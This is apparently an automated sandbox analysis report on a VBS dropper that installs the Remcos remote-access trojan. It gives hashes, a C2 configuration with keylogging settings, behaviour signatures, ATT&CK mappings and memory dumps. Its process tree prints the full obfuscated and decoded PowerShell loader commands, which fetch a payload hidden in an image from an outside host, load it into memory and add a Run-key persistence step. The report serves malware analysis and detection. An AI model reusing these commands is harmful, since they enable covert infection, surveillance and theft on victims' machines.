remcos | 3b0a938deff8206e336ac2fd86c31c3f9ad22e493ba037c2bc14c7b424e3f4eb | Triage

Analysis

max time kernel
299s
max time network
286s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
20-04-2024 09:46

Sharing

Report Analysis Logs

General

Target

UZOyJ.vbs
Size

12KB
MD5

bbda92e82f45a249a542b40c6ecfa507
SHA1

aa678d29ba51f72a02c73f898ebbe0eb6ce60a74
SHA256

3b0a938deff8206e336ac2fd86c31c3f9ad22e493ba037c2bc14c7b424e3f4eb
SHA512

dcf8b1556440ca86e5ff963812ef071464a6f00249ba039ce20b68cbe5a571c010d2537b86e23563b4dc47465230b3c1279bd5c411b1a864de38b1332f2b9079
SSDEEP

384:Y/VwiDCXdu3NF3S0P0V2VVSUEEJNcr5+EJNcr5z525f+ofhuSw309RWEd+m0Wio9:Y/Si+Xd0NNbP0V2VMUEEJNcV+EJNcVzg

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

sembe.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
notess
keylog_path
%AppData%
mouse_option
false
mutex
Rmc-P0AEMX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

5 2724 powershell.exe
7 2724 powershell.exe
10 2724 powershell.exe
11 2724 powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\WQQ.vbs"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2724 set thread context of 2432 2724 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2532 powershell.exe
2724 powershell.exe
1152 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2532 powershell.exe
Token: SeDebugPrivilege 2724 powershell.exe
Token: SeDebugPrivilege 1152 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegAsm.exe

pid process

2432 RegAsm.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2068 wrote to memory of 2532	2068	WScript.exe	powershell.exe
PID 2068 wrote to memory of 2532	2068	WScript.exe	powershell.exe
PID 2068 wrote to memory of 2532	2068	WScript.exe	powershell.exe
PID 2532 wrote to memory of 2724	2532	powershell.exe	powershell.exe
PID 2532 wrote to memory of 2724	2532	powershell.exe	powershell.exe
PID 2532 wrote to memory of 2724	2532	powershell.exe	powershell.exe
PID 2724 wrote to memory of 1152	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 1152	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 1152	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe
PID 2724 wrote to memory of 2432	2724	powershell.exe	RegAsm.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\UZOyJ.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRgBEDgTreFEDgTreVwDgTrevDgTreDQDgTreNDgTreDgTrexDgTreC8DgTreNQDgTre3DgTreC4DgTreMDgTreDgTre2DgTreC4DgTreNQDgTre5DgTreC4DgTreMwDgTreyDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBXDgTreFEDgTreUQDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:2432

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Privilege Escalation

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Defense Evasion

Modify Registry

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
02c85a7e3f6766f01aa671edf2d77009

SHA1
7559816c6f636e2ecfde85a280c5d16ce56b99d3

SHA256
d4f446486d70e7bcdc438517773a2bdcaabc565605e7dd5ae29e3e41b475740b

SHA512
7f2bdb99ed5519e359ee2878a34b84e9a0cac4e1e03950c512f1d0911f7205880de85eeb5e381c5feb3590a8875d3f2ac4916ea64dc9ef90871418a3adbcd731

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3FE0.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4563.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
f32794e80289f874bb6a07058cd6aea9

SHA1
08523f491fab1d7166bb82fec35d88083b9a9586

SHA256
334cc2888984fc0f64d0a8827f8cda6b4f4091853e5083280172e24e2702288a

SHA512
3b243e89f5ce1844d42eb8312d2bfa2ee6fed2b47832d4aac92a919c0c59a26f58c2d8d5b2d6d6db1697d8fb060c5a9fca78747d7c83ab6c58f5eacd6eba9c2f

Download Submit
C:\Users\Admin\AppData\Roaming\notess\logs.dat
Filesize
144B

MD5
89f06507932409522671c96d20f317a1

SHA1
9dac09a8da82a2ca809b1453dfe95b2091c8f9cc

SHA256
fb115bb93d25b9330c2097fed9bc1417412109efbb870d725b64685151a918b8

SHA512
9c7924346a277b61400efb81f57d61be947ee22c9eea0461481f6dd4b7b0db94ca0cb3b7149830a2e42355b144ff9ce615b49e1b6e1c22e1a3f20a01aa7e819b

Download Submit
memory/1152-107-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/1152-105-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/1152-104-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/1152-103-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/1152-102-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/1152-101-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2432-136-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-144-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-202-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-201-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-185-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-178-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-177-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-170-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-169-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-162-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-161-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-154-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-153-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-149-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-145-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-139-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-138-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-137-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-108-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-110-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-112-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-113-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-115-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-117-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-119-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-121-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-123-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2432-124-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-135-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-126-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-129-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-130-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-131-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2432-133-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2532-88-0x0000000002ED0000-0x0000000002F50000-memory.dmp

Filesize
512KB

Download
memory/2532-86-0x0000000002ED0000-0x0000000002F50000-memory.dmp

Filesize
512KB

Download
memory/2532-5-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-6-0x0000000002ED0000-0x0000000002F50000-memory.dmp

Filesize
512KB

Download
memory/2532-7-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2532-8-0x0000000002ED0000-0x0000000002F50000-memory.dmp

Filesize
512KB

Download
memory/2532-87-0x0000000002ED0000-0x0000000002F50000-memory.dmp

Filesize
512KB

Download
